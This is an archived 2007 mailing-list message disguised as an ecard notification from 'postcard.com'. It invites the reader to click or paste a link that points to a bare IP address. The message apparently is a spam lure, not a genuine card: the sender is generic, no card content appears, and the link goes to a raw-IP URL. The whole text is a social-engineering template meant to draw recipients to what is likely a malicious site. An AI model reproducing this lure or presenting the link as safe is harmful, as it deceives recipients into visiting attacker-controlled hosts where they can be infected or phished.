LISTSERV_HELP Archives

July 2007

From:
"postcard.com" <[log in to unmask]>
Date:
Thu, 5 Jul 2007 15:08:17 -0600
Hi. Class mate has sent you an ecard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:

http://69.242.9.130/?2b1c85da463c5c036b0339eb3a6075338ee7c

Or copy and paste it into your browser's "Location" box (where Internet
addresses go).

PRIVACY
postcard.com honors your privacy. Our home page and Card Pick Up have links to our
Privacy Policy.

TERMS OF USE
By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card,
please disregard this Announcement.

We hope you enjoy your awesome card.

Wishing you the best,
Webmaster,